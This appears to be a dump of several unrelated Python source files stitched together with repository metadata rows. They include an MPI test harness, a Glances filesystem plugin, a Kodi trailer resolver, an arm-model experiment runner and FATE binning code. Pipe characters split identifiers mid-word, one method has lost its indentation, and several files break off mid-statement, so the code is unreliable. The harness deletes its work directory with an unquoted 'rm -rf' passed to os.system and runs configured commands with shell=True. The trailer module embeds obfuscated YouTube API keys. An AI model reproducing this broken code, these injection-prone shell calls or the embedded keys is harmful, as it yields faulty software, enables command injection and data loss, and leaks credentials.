    (in that order, later wins) on top of each other and prepare result
    storage.

    config -- DOUGConfigParser with at least [doug] workdir set
    dougControls -- optional extra ControlFile overriding the defaults
    """
    self.workdir = os.path.abspath(config.get('doug', 'workdir'))
    self.config = DOUGConfigParser(name='DOUG execution', basedir=self.workdir)
    # default config
    self.config.addConfig(getDefaultConfig())
    self.config.addControlFile(getDefaultControlFile(self.workdir))
    # copy controls from control file
    if dougControls is not None:
        self.config.addControlFile(dougControls)
    # copy config (caller-provided values take precedence over defaults)
    self.config.addConfig(config)
    # output or other files, exception grabs it on exit
    self.files = []
    # how many test results are using this test, files are deleted only after last free() call
    self._inUse = 0
    self.preserveOutput = self.config.getboolean("doug", "preserveOutput")
    self.result = DOUGConfigParser(self.config.defaults(), basedir=self.workdir)
    self.result.add_section('doug-result')
def setUp(self):
    """Create the working directory, write the control file and boot MPI.

    On any failure the partially created state is cleaned up and the
    exception re-raised.
    """
    LOG.debug("Preparing testing environment")
    # NOTE(review): self-assignment is a no-op; probably leftover code.
    self.workdir = self.workdir
    if os.path.isdir(self.workdir):
        # Existing directory: remember not to delete it in _clean().
        self.workdirExisted = True
    else:
        self.workdirExisted = False
        os.mkdir(self.workdir)
        LOG.debug("Working directory %s created" % self.workdir)
    try:
        # create control file
        self.testctrlfname = os.path.abspath(os.path.join(self.workdir, 'DOUG-exec.ctl'))
        controlFile = self.config.getControlFile(self.testctrlfname)
        controlFile.save(self.testctrlfname)
        self.files.append((self.testctrlfname, "Control file"))
        # run mpiboot (optional; skipped when the config value is empty)
        mpibootname = self.config.get("doug", "mpiboot")
        outfilename = self.config.get("doug", "mpiboot-outfilename")
        errfilename = self.config.get("doug", "mpiboot-errfilename")
        if mpibootname:
            LOG.debug("Setting up mpi")
            mpiboot = subprocess.Popen("%s > %s 2> %s" % (mpibootname, outfilename, errfilename), shell=True)
            res = mpiboot.wait()
            if res:
                raise ScriptException("Error running %s (%d)"
                                      "inspect output files (%s, %s) for error description."
                                      % (mpibootname, res, outfilename, errfilename))
    except:
        # Remove whatever was created before propagating the error.
        self._clean()
        raise
def tearDown(self):
    """Shut down the MPI universe; failures are logged, never raised."""
    try:
        mpihaltname = self.config.get("doug", "mpihalt")
        if mpihaltname:
            outfilename = self.config.get("doug", "mpihalt-outfilename")
            errfilename = self.config.get("doug", "mpihalt-errfilename")
            LOG.debug("Shutting down mpi")
            mpihalt = subprocess.Popen("%s > %s 2> %s" % (mpihaltname, outfilename, errfilename), shell=True)
            import time
            time.sleep(4) # lamhalt <=7.1.1 does not wait until whole universe is shut down
            res = mpihalt.wait()
            if res:
                # Non-zero exit is only a warning during teardown.
                LOG.warn("Error running %s (%d)"
                         "inspect output files (%s, %s) for error description."
                         % (mpihaltname, res, outfilename, errfilename))
    except Exception, e:
        LOG.warn("Exception running mpihalt: %s" % e)
def _clean(self):
    """Delete the working directory unless output is preserved or the
    directory existed before setUp()."""
    if self.preserveOutput or self.workdirExisted:
        return
    os.system('rm -rf %s' % self.workdir)
    LOG.debug("Temporary directory %s deleted" % self.workdir)
def acquire(self):
    """Register one more consumer of this execution's output files."""
    self._inUse += 1
def free(self):
    """Drop one consumer reference; the last release deletes the files."""
    self._inUse -= 1
    if not self._inUse:
        self._clean()
def run(self):
    """Convenience alias for runDOUG()."""
    return self.runDOUG()
def runDOUG(self):
LOG.debug("Running DOUG")
nproc = self.config.getint('doug', 'nproc')
solver = self.config.getint('doug-controls', 'solver')
nsubdomains = self.config.getint('doug-controls', 'num_subdomains')
levels = self.config.getint('doug-controls', 'levels')
method = self.config.getint('doug-controls', 'method')
fine_method = self.config.getint('doug-controls', 'fine_method')
smoothers = self.config.getint('doug-controls', 'smoothers')
overlap = self.config.getint('doug-controls', 'overlap')
LOG.info("solver=%d, method=%d, levels=%d, fine_method=%d, num_subdomains=%d, nproc=%d, overlap=%d, smoothers=%d" % (solver, method, levels, fine_method, nsubdomains, nproc, overlap, smoothers))
mpirun = self.config.get("doug", "mpirun")
main = self.config.get("doug", "executable")
bindir = self.config.get("doug", "bindir")
main = os.path.join(bindir, main)
errfname = self.config.getpath("doug", "errfilename")
outfname = self.config.getpath("doug", "outfilename")
solutionfname = self.config.getpath('doug-controls', 'solution_file')
curdir = os.getcwd()
result = self.result
try:
LOG.debug("Changing directory to %s" % self.workdir)
os.chdir(self.workdir)
outf = open(outfname, "w")
errf = open(errfname, "w")
try:
args = [mpirun, "-np", "%d"%nproc, main, "-f", self.testctrlfname, "-p"]
LOG.info("Running %s" % " ".join(args))
doug = subprocess.Popen(args, stdout=outf, stderr=errf)
import time
maxtime = self.config.getint('doug', 'max-time')
for i in xrange(maxtime): # ~1 minute
time.sleep(1)
doug.poll()
if doug.returncode != None:
break
else:
LOG.info("Terminating DOUG")
doug.terminate()
doug.wait()
value = doug.returncode
LOG.debug("Finished %s with code %d" % (mpirun, value))
self.files.append((outfname, "%s standard output" % mpirun))
self.files.append((errfname, "%s standard error" % mpirun))
result.setpath('doug-result', 'returnvalue', str(value))
result.setpath('doug-result', 'outputfile', outfname)
result.setpath('doug-result', 'errorfile', errfname)
if value != 0:
se = ScriptException("Error occured while running doug (value=%d), "
"inspect output files (%s, %s) for error description." %
(value, outfname, errfname))
raise se
if solutionfname and os.path.isfile(solutionfname):
result.setpath('doug-result', 'solutionfile', solutionfname)
if solutionfname and os.path.isfile('aggr1.t | xt'):
result.setpath('doug-result', 'fineaggrsfile', 'aggr1.txt')
#self.files | .append(("aggr1.txt", "Fine aggregates"))
if solutionfname and os.path.isfile('aggr2.txt'):
result.setpath('doug-result', 'coarseaggrsfile', 'aggr2.txt')
#self.files.append(("aggr2.txt", "Coarse aggregates"))
files = os.listdir(self.workdir)
files = filter(lambda name: name.startswith('prof. |
huijunwu/heron | heron/tools/ui/src/python/handlers/api/__init__.py | Python | apache-2.0 | 1,275 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
''' api module '''
from .metrics import (
MetricsHandler,
MetricsTimelineHandler
)
from .topology import (
TopologyExceptionSummaryHandler,
ListTopologiesJsonHandler,
Top | ologyLogicalPlanJsonHandler,
TopologyPackingPlanJsonHandler,
TopologyPhysicalPlanJsonHandler,
TopologySchedulerLocationJsonHandler,
TopologyExecutionStateJsonHandler,
TopologyExceptionsJsonHandler,
PidHan | dler,
JstackHandler,
MemoryHistogramHandler,
JmapHandler
)
|
subodhchhabra/glances | glances/plugins/glances_fs.py | Python | lgpl-3.0 | 10,262 | 0.001169 | # -*- coding: utf-8 -*-
#
# This file is part of Glances.
#
# Copyright (C) 2015 Nicolargo <nicolas@nicolargo.com>
#
# Glances is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Glances is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""File system plugin."""
import operator
from glances.plugins.glances_plugin import GlancesPlugin
import psutil
# SNMP OID
# The snmpd.conf needs to be edited.
# Add the following to enable it on all disk
# ...
# includeAllDisks 10%
# ...
# The OIDs are as follows (for the first disk)
# Path where the disk is mounted: .1.3.6.1.4.1.2021.9.1.2.1
# Path of the device for the partition: .1.3.6.1.4.1.2021.9.1.3.1
# Total size of the disk/partion (kBytes): .1.3.6.1.4.1.2021.9.1.6.1
# Available space on the disk: .1.3.6.1.4.1.2021.9.1.7.1
# Used space on the disk: .1.3.6.1.4.1.2021.9.1.8.1
# Percentage of space used on disk: .1.3.6.1.4.1.2021.9.1.9.1
# Percentage of inodes used on disk: .1.3.6.1.4.1.2021.9.1.10.1
# Per-platform SNMP OID tables; keys name the fields exposed in stats.
snmp_oid = {'default': {'mnt_point': '1.3.6.1.4.1.2021.9.1.2',
                        'device_name': '1.3.6.1.4.1.2021.9.1.3',
                        'size': '1.3.6.1.4.1.2021.9.1.6',
                        'used': '1.3.6.1.4.1.2021.9.1.8',
                        'percent': '1.3.6.1.4.1.2021.9.1.9'},
            'windows': {'mnt_point': '1.3.6.1.2.1.25.2.3.1.3',
                        'alloc_unit': '1.3.6.1.2.1.25.2.3.1.4',
                        'size': '1.3.6.1.2.1.25.2.3.1.5',
                        'used': '1.3.6.1.2.1.25.2.3.1.6'},
            'netapp': {'mnt_point': '1.3.6.1.4.1.789.1.5.4.1.2',
                       'device_name': '1.3.6.1.4.1.789.1.5.4.1.10',
                       'size': '1.3.6.1.4.1.789.1.5.4.1.3',
                       'used': '1.3.6.1.4.1.789.1.5.4.1.4',
                       'percent': '1.3.6.1.4.1.789.1.5.4.1.6'}}
# ESXi exposes the same OID layout as Windows.
snmp_oid['esxi'] = snmp_oid['windows']
# Define the history items list
# All items in this list will be historised if the --enable-history tag is set
# 'color' define the graph color in #RGB format
items_history_list = [{'name': 'percent', 'color': '#00FF00'}]
class Plugin(GlancesPlugin):
"""Glances file system plugin.
stats is a list
"""
def __init__(self, args=None):
    """Init the plugin."""
    super(Plugin, self).__init__(args=args, items_history_list=items_history_list)
    # File-system stats are rendered in the curses interface.
    self.display_curse = True
    # Start from an empty stats list.
    self.reset()
def get_key(self):
    """Each stats entry is keyed by its mount point."""
    return 'mnt_point'
def reset(self):
    """Drop all collected file-system stats."""
    self.stats = []
@GlancesPlugin._log_result_decorator
def update(self):
    """Update the FS stats using the input method.

    'local' reads via psutil; 'snmp' bulk-walks the per-platform OID
    table.  Returns the (possibly empty) stats list.
    """
    # Reset the list
    self.reset()
    if self.input_method == 'local':
        # Update stats using the standard system lib
        # Grab the stats using the PsUtil disk_partitions
        # If 'all'=False return physical devices only (e.g. hard disks, cd-rom drives, USB keys)
        # and ignore all others (e.g. memory partitions such as /dev/shm)
        try:
            fs_stat = psutil.disk_partitions(all=False)
        except UnicodeDecodeError:
            # Non-decodable mount point name: bail out with what we have.
            return self.stats
        # Optionnal hack to allow logicals mounts points (issue #448)
        # Ex: Had to put 'allow=zfs' in the [fs] section of the conf file
        # to allow zfs monitoring
        for fstype in self.get_conf_value('allow'):
            try:
                fs_stat += [f for f in psutil.disk_partitions(all=True) if f.fstype.find(fstype) >= 0]
            except UnicodeDecodeError:
                return self.stats
        # Loop over fs
        for fs in fs_stat:
            # Do not take hidden file system into account
            if self.is_hide(fs.mountpoint):
                continue
            # Grab the disk usage
            try:
                fs_usage = psutil.disk_usage(fs.mountpoint)
            except OSError:
                # Correct issue #346
                # Disk is ejected during the command
                continue
            fs_current = {
                'device_name': fs.device,
                'fs_type': fs.fstype,
                'mnt_point': fs.mountpoint,
                'size': fs_usage.total,
                'used': fs_usage.used,
                'free': fs_usage.free,
                'percent': fs_usage.percent,
                'key': self.get_key()}
            self.stats.append(fs_current)
    elif self.input_method == 'snmp':
        # Update stats using SNMP
        # SNMP bulk command to get all file system in one shot
        try:
            fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid[self.short_system_name],
                                          bulk=True)
        except KeyError:
            # Unknown platform: fall back to the generic OID table.
            fs_stat = self.get_stats_snmp(snmp_oid=snmp_oid['default'],
                                          bulk=True)
        # Loop over fs
        if self.short_system_name in ('windows', 'esxi'):
            # Windows or ESXi tips
            for fs in fs_stat:
                # Memory stats are grabbed in the same OID table (ignore it)
                if fs == 'Virtual Memory' or fs == 'Physical Memory' or fs == 'Real Memory':
                    continue
                # Sizes are reported in allocation units, not bytes.
                size = int(fs_stat[fs]['size']) * int(fs_stat[fs]['alloc_unit'])
                used = int(fs_stat[fs]['used']) * int(fs_stat[fs]['alloc_unit'])
                percent = float(used * 100 / size)
                fs_current = {
                    'device_name': '',
                    'mnt_point': fs.partition(' ')[0],
                    'size': size,
                    'used': used,
                    'percent': percent,
                    'key': self.get_key()}
                self.stats.append(fs_current)
        else:
            # Default behavior: sizes reported in kBytes.
            for fs in fs_stat:
                fs_current = {
                    'device_name': fs_stat[fs]['device_name'],
                    'mnt_point': fs,
                    'size': int(fs_stat[fs]['size']) * 1024,
                    'used': int(fs_stat[fs]['used']) * 1024,
                    'percent': float(fs_stat[fs]['percent']),
                    'key': self.get_key()}
                self.stats.append(fs_current)
    # Update the history list
    self.update_stats_history('mnt_point')
    # Update the view
    self.update_views()
    return self.stats
def update_views(self):
    """Update stats views."""
    # Let the base class do the generic part first.
    super(Plugin, self).update_views()
    # Decorate each filesystem's 'used' field with its alert level.
    for fs in self.stats:
        alert = self.get_alert(fs['used'], maximum=fs['size'], header=fs['mnt_point'])
        self.views[fs[self.get_key()]]['used']['decoration'] = alert
def msg_curse(self, args=None, max_width=None):
"""Return the dict to display in the curse interface."""
# Init the return message
ret = []
# Only process if stats exist and display plugin enable...
if not self.stats or args.disable_fs:
return ret
# Max size for the fsname name
if max_width is not None and max_width >= 23:
# Interface size name = max_width - space for interfaces bitrat |
TakeshiTseng/HyperRyu | hyper_ryu/vtopo/vtopo.py | Python | mit | 884 | 0 | '''
Virtual topology
'''
class VTopo(object):
    '''
    Virtual topology.

    Attributes:
    - isStart : True once start() has run
    - switches : virtual switch list
    - links : virtual links
    '''
    def __init__(self):
        super(VTopo, self).__init__()
        self.isStart = False
        self.switches = []
        self.links = []
    def addSwitch(self, vswitch):
        '''
        Add a new virtual switch; physical/virtual mapping is meant to
        happen automatically. (Not implemented yet.)
        '''
        pass
    def addLink(self, vlink):
        '''
        Add a new virtual link; physical/virtual mapping is meant to
        happen automatically. (Not implemented yet.)
        '''
        pass
    def getVPSwitchMapping(self, vswitch):
        '''
        Get the virtual-to-physical switch mapping. (Not implemented yet.)
        '''
        pass
    def getPVSwitchMapping(self, pswitch):
        '''
        Get the physical-to-virtual switch mapping. (Not implemented yet.)
        '''
        pass
    def start(self):
        pass
|
Coelhon/MasterRepo.repository | plugin.video.zen/resources/lib/modules/trailer.py | Python | gpl-2.0 | 3,897 | 0.010521 | # -*- coding: utf-8 -*-
'''
zen Add-on
Copyright (C) 2016 zen
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,json,urlparse,base64,random
from resources.lib.modules import client
from resources.lib.modules import control
class trailer:
    """Find and resolve a YouTube trailer for a given title.

    Uses the YouTube Data v3 search API (obfuscated API keys) and hands
    playback URLs to the Kodi youtube plugin.
    """
    def __init__(self):
        self.base_link = 'http://www.youtube.com'
        # One of two base64-obfuscated API keys, chosen at random.
        self.key_link = random.choice(['QUl6YVN5RDd2aFpDLTYta2habTVuYlVyLTZ0Q0JRQnZWcnFkeHNz', 'QUl6YVN5Q2RiNEFNenZpVG0yaHJhSFY3MXo2Nl9HNXBhM2ZvVXd3'])
        self.key_link = '&key=%s' % base64.urlsafe_b64decode(self.key_link)
        self.search_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&type=video&maxResults=5&q=%s'
        self.youtube_search = 'https://www.googleapis.com/youtube/v3/search?q='
        self.youtube_watch = 'http://www.youtube.com/watch?v=%s'
    def play(self, name, url=None):
        """Resolve *name*/*url* to a playable stream and start playback.

        Errors are swallowed silently (nothing is played).
        """
        try:
            url = self.worker(name, url)
            if url == None: return
            title = control.infoLabel('listitem.title')
            if title == '': title = control.infoLabel('listitem.label')
            icon = control.infoLabel('listitem.icon')
            item = control.item(path=url, iconImage=icon, thumbnailImage=icon)
            # setArt is not available on very old Kodi versions.
            try: item.setArt({'icon': icon})
            except: pass
            item.setInfo(type='Video', infoLabels = {'title': title})
            control.player.play(url, item)
        except:
            pass
    def worker(self, name, url):
        """Turn *url* (full URL, video id, or None) into a playable URL.

        Falls back to a YouTube search on "<name> trailer" when *url*
        cannot be resolved directly.
        """
        try:
            if url.startswith(self.base_link):
                url = self.resolve(url)
                if url == None: raise Exception()
                return url
            elif not url.startswith('http://'):
                # Bare video id: expand to a watch URL first.
                url = self.youtube_watch % url
                url = self.resolve(url)
                if url == None: raise Exception()
                return url
            else:
                raise Exception()
        except:
            # Any failure (including url=None) falls back to searching.
            query = name + ' trailer'
            query = self.youtube_search + query
            url = self.search(query)
            if url == None: return
            return url
    def search(self, url):
        """Run the YouTube API search in *url*; return the first resolvable hit."""
        try:
            query = urlparse.parse_qs(urlparse.urlparse(url).query)['q'][0]
            url = self.search_link % urllib.quote_plus(query) + self.key_link
            result = client.request(url)
            items = json.loads(result)['items']
            items = [(i['id']['videoId']) for i in items]
            for url in items:
                url = self.resolve(url)
                if not url is None: return url
        except:
            return
    def resolve(self, url):
        """Check the video page is playable and return a youtube-plugin URL.

        Returns None for unavailable/region-blocked videos or on error.
        """
        try:
            id = url.split('?v=')[-1].split('/')[-1].split('?')[0].split('&')[0]
            result = client.request('http://www.youtube.com/watch?v=%s' % id)
            message = client.parseDOM(result, 'div', attrs = {'id': 'unavailable-submessage'})
            message = ''.join(message)
            alert = client.parseDOM(result, 'div', attrs = {'id': 'watch7-notification-area'})
            # A notification area or an unavailability message means no playback.
            if len(alert) > 0: raise Exception()
            if re.search('[a-zA-Z]', message): raise Exception()
            url = 'plugin://plugin.video.youtube/play/?video_id=%s' % id
            return url
        except:
            return
|
osigaud/ArmModelPython | Control/Experiments/Experiments.py | Python | gpl-2.0 | 14,422 | 0.014284 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author: Thomas Beucher
Module: Experiments
Description: Class used to generate all the trajectories of the experimental setup and also used for CMAES optimization
'''
import numpy as np
import time
#from Utils.ThetaNormalization import normalization, unNormalization
from GlobalVariables import pathDataFolder
from TrajMaker import TrajMaker
from Utils.FileWriting import checkIfFolderExists, findDataFilename, writeArray
from multiprocess.pool import Pool
from functools | import partial
#------------------------------------------------------------------------------
class Experiments:
def __init__(self, rs, sizeOfTarget, saveTraj, foldername, thetafile, popSize, period, estim="Inv"):
    '''
    Initializes parameters used to run functions below

    Inputs:
        rs -- global settings object (dimensions, repeat count, file names)
        sizeOfTarget -- target size forwarded to TrajMaker
        saveTraj -- whether trajectories are saved to disk
        foldername -- output folder for costs/times/final coordinates
        thetafile -- controller parameter file name
        popSize -- CMA-ES population size
        period -- CMA-ES checkpoint period
        estim -- state estimation scheme (default "Inv")
    '''
    self.rs = rs
    self.name = "Experiments"
    self.call = 0
    self.dimState = rs.inputDim
    self.dimOutput = rs.outputDim
    self.numberOfRepeat = rs.numberOfRepeatEachTraj
    self.foldername = foldername
    self.tm = TrajMaker(rs, sizeOfTarget, saveTraj, thetafile, estim)
    self.posIni = np.loadtxt(pathDataFolder + rs.experimentFilePosIni)
    # np.loadtxt yields a 1-D array for a single start point; normalise to 2-D
    if(len(self.posIni.shape)==1):
        self.posIni=self.posIni.reshape((1,self.posIni.shape[0]))
    self.costStore = []
    self.cost12Store=[]
    self.CMAESCostStore = []
    self.CMAESTimeStore = []
    self.trajTimeStore = []
    self.bestCost = -10000.0
    self.lastCoord = []
    self.popSize = popSize
    self.period = period
def printLastCoordInfo(self):
    """Print mean/min/max of the recorded final X coordinates."""
    coords = np.array(self.lastCoord)
    print ("moyenne : "+ str(np.mean(coords)))
    print ("min : " + str(np.min(coords)))
    print ("max :" + str(np.max(coords)))
def initTheta(self, theta):
    """Install *theta* (controller parameter vector) on the trajectory maker."""
    self.theta = theta
    self.tm.setTheta(self.theta)
def saveCost(self):
    """Write accumulated costs, U12 costs, trajectory times and final X
    coordinates to their respective sub-folders."""
    writeArray(self.costStore, self.foldername+"Cost/", "traj", ".cost")
    writeArray(self.cost12Store, self.foldername+"CostU12/", "traj", ".cost")
    writeArray(self.trajTimeStore, self.foldername+"TrajTime/", "traj", ".time")
    writeArray(self.lastCoord, self.foldername+"finalX/", "x", ".last")
    def setNoise(self, noise):
        # Forward the noise level to the trajectory maker (note the
        # lowercase `setnoise` method name on TrajMaker).
        self.tm.setnoise(noise)
def runOneTrajectory(self, x, y):
#self.tm.saveTraj = True
cost, trajTime, lastX = self.tm.runTrajectory(x, y, self.foldername)
#cost, trajTime, lastX = self.tm.runTrajectoryOpti(x, y)
#print "Exp local x y cost : ", x, y, cost
if lastX != -1000:
self.lastCoord.append(lastX)
return cost, trajTime
    def runRichTrajectories(self, repeat):
        """Evaluate the current controller on the dense circular grid.

        Runs every point of the PosCircu540 data set `repeat` times,
        appends the per-point mean cost and trajectory time to the stores,
        and returns the mean cost over all points.
        """
        globCost = []
        xy = np.loadtxt(pathDataFolder + "PosCircu540")
        #xy = np.loadtxt(pathDataFolder + "PosSquare")
        for el in xy:
            costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
            for i in range(repeat):
                costAll[i], trajTimeAll[i] = self.runOneTrajectory(el[0], el[1])
            meanCost = np.mean(costAll)
            meanTrajTime = np.mean(trajTimeAll)
            self.costStore.append([el[0], el[1], meanCost])
            self.trajTimeStore.append([el[0], el[1], meanTrajTime])
            globCost.append(meanCost)
        return np.mean(globCost)
def runTrajectoriesForResultsGeneration(self, repeat):
globMeanCost=0.
globTimeCost=0.
for xy in self.posIni:
costAll, trajTimeAll, costU12 = np.zeros(repeat), np.zeros(repeat), np.zeros(repeat)
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
costU12[i] = self.tm.costU12
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
meanCostU12=np.mean(costU12)
self.costStore.append([xy[0], xy[1], meanCost])
self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
self.cost12Store.append([xy[0], xy[1], meanCostU12])
globMeanCost+=meanCost
globTimeCost+=meanTrajTime
#self.printLastCoordInfo()
return globMeanCost/len(self.posIni), globTimeCost/len(self.posIni)
    def runTrajectoriesForResultsGenerationNController(self, repeat, thetaName):
        """Like runTrajectoriesForResultsGeneration, but loads a separate
        controller per starting point.

        thetaName is a file-name pattern containing '*', replaced by the
        point index to locate each controller file.

        NOTE(review): a missing controller file raises IOError and the
        point is silently skipped (best effort), yet the final averages
        still divide by the total number of points — confirm this is the
        intended behavior for partially available controllers.
        """
        globMeanCost=0.
        globTimeCost=0.
        for enum,xy in enumerate(self.posIni):
            try :
                costAll, trajTimeAll, costU12 = np.zeros(repeat), np.zeros(repeat), np.zeros(repeat)
                controllerFileName = thetaName.replace("*",str(enum))
                self.tm.controller.load(controllerFileName)
                for i in range(repeat):
                    costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
                    costU12[i] = self.tm.costU12
                meanCost = np.mean(costAll)
                meanTrajTime = np.mean(trajTimeAll)
                meanCostU12=np.mean(costU12)
                self.costStore.append([xy[0], xy[1], meanCost])
                self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
                self.cost12Store.append([xy[0], xy[1], meanCostU12])
                globMeanCost+=meanCost
                globTimeCost+=meanTrajTime
            except IOError:
                pass
        #self.printLastCoordInfo()
        return globMeanCost/len(self.posIni), globTimeCost/len(self.posIni)
    def runTrajectoriesForResultsGenerationOnePoint(self, repeat, point):
        """Run `repeat` trajectories from the starting point at index
        `point` of posIni and return (mean cost, mean trajectory time).
        """
        xy = self.posIni[point]
        costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
        for i in range(repeat):
            costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
        meanCost = np.mean(costAll)
        meanTrajTime = np.mean(trajTimeAll)
        return meanCost, meanTrajTime
    def runTrajectoriesForResultsGenerationOpti(self, repeat):
        """Same evaluation loop as runTrajectoriesForResultsGeneration but
        driving runOneTrajectoryOpti (defined elsewhere in this class),
        without the U1/U2 cost bookkeeping.
        """
        globMeanCost=0.
        globTimeCost=0.
        #pool=Pool()
        # NOTE(review): the buffers are allocated once and reused across
        # start points; each inner loop fully overwrites them.
        costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
        for xy in self.posIni:
            for i in range(repeat):
                costAll[i], trajTimeAll[i] = self.runOneTrajectoryOpti(xy[0], xy[1])
            meanCost = np.mean(costAll)
            meanTrajTime = np.mean(trajTimeAll)
            self.costStore.append([xy[0], xy[1], meanCost])
            self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
            globMeanCost+=meanCost
            globTimeCost+=meanTrajTime
        #self.printLastCoordInfo()
        size=len(self.posIni)
        return globMeanCost/size, globTimeCost/size
    def runTrajectoriesForResultsGenerationEstim(self, repeat):
        """Same evaluation loop as runTrajectoriesForResultsGenerationOpti
        but driving runOneTrajectoryEstim (defined elsewhere in this
        class).  Returns (mean cost, mean trajectory time) over posIni.
        """
        globMeanCost=0.
        globTimeCost=0.
        #pool=Pool()
        # Buffers reused across start points; fully overwritten each loop.
        costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
        for xy in self.posIni:
            for i in range(repeat):
                costAll[i], trajTimeAll[i] = self.runOneTrajectoryEstim(xy[0], xy[1])
            meanCost = np.mean(costAll)
            meanTrajTime = np.mean(trajTimeAll)
            self.costStore.append([xy[0], xy[1], meanCost])
            self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
            globMeanCost+=meanCost
            globTimeCost+=meanTrajTime
        #self.printLastCoordInfo()
        size=len(self.posIni)
        return globMeanCost/size, globTimeCost/size
def runMultiProcessTrajectories(self, repeat):
pool=Pool(processes=len(self.posIni))
result = pool.map(partial(self.runNtrajectory, repeat=repeat) , [(x, y) for x, y in self.posIni])
pool.close()
|
FederatedAI/FATE | python/federatedml/feature/homo_feature_binning/homo_binning_base.py | Python | apache-2.0 | 9,934 | 0.003221 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless | required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express | or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import numpy as np
from federatedml.util import LOGGER
from federatedml.feature.binning.base_binning import BaseBinning
from federatedml.framework import weights
from fate_arch.session import computing_session as session
from federatedml.param.feature_binning_param import HomoFeatureBinningParam
from federatedml.statistic.data_statistics import MultivariateStatisticalSummary
from federatedml.transfer_variable.transfer_class.homo_binning_transfer_variable import HomoBinningTransferVariable
from federatedml.util import consts
class SplitPointNode(object):
    """One candidate quantile split point tracked during the federated
    binary search.  Each node keeps its current value, the search bounds,
    the rank it should converge to, and whether it is already fixed."""

    def __init__(self, value, min_value, max_value, aim_rank=None, allow_error_rank=0, last_rank=-1):
        self.value = value
        self.min_value = min_value
        self.max_value = max_value
        self.aim_rank = aim_rank
        self.allow_error_rank = allow_error_rank
        self.last_rank = last_rank
        self.fixed = False

    def set_aim_rank(self, rank):
        """Record the global rank this split point should converge to."""
        self.aim_rank = rank

    def create_right_new(self):
        """Bisect towards the upper bound and return the new node.

        When the interval has collapsed below the float tolerance, the
        current node is frozen and returned instead.
        """
        midpoint = (self.value + self.max_value) / 2
        if np.fabs(midpoint - self.value) <= consts.FLOAT_ZERO * 0.1:
            self.fixed = True
            return self
        return SplitPointNode(midpoint, self.value, self.max_value, self.aim_rank, self.allow_error_rank)

    def create_left_new(self):
        """Bisect towards the lower bound and return the new node.

        When the interval has collapsed below the float tolerance, the
        current node is frozen and returned instead.
        """
        midpoint = (self.value + self.min_value) / 2
        if np.fabs(midpoint - self.value) <= consts.FLOAT_ZERO * 0.1:
            self.fixed = True
            return self
        return SplitPointNode(midpoint, self.min_value, self.max_value, self.aim_rank, self.allow_error_rank)
class RankArray(object):
    """Per-feature rank counters with convergence tracking.

    rank_array holds the current rank of each split point; entries whose
    rank moved less than `error_rank` since `last_rank_array` are marked
    fixed and stop accumulating further contributions.
    """

    def __init__(self, rank_array, error_rank, last_rank_array=None):
        self.rank_array = rank_array
        self.last_rank_array = last_rank_array
        self.error_rank = error_rank
        self.all_fix = False
        self.fixed_array = np.zeros(len(self.rank_array), dtype=bool)
        self._compare()

    def _compare(self):
        """Refresh fixed_array/all_fix from the previous round's ranks."""
        if self.last_rank_array is None:
            # First round: nothing to compare against yet.
            return
        self.fixed_array = abs(self.rank_array - self.last_rank_array) < self.error_rank
        # Sanity check: the element-wise comparison must stay vectorized.
        assert isinstance(self.fixed_array, np.ndarray)
        if self.fixed_array.all():
            self.all_fix = True

    def __iadd__(self, other: 'RankArray'):
        """Accumulate `other` in place, skipping already-fixed entries."""
        for idx, is_fixed in enumerate(self.fixed_array):
            if not is_fixed:
                self.rank_array[idx] += other.rank_array[idx]
        self._compare()
        return self

    def __add__(self, other: 'RankArray'):
        """Return a new RankArray; fixed entries keep their current rank."""
        summed = np.where(self.fixed_array, self.rank_array,
                          self.rank_array + other.rank_array)
        return RankArray(summed, self.error_rank, self.last_rank_array)
class Server(BaseBinning):
    """Arbiter-side driver of the federated quantile-binning protocol.

    Aggregates client statistics (counts, min/max, ranks) and broadcasts
    the combined results back.  `suffix` namespaces each protocol round so
    successive exchanges do not collide.
    """

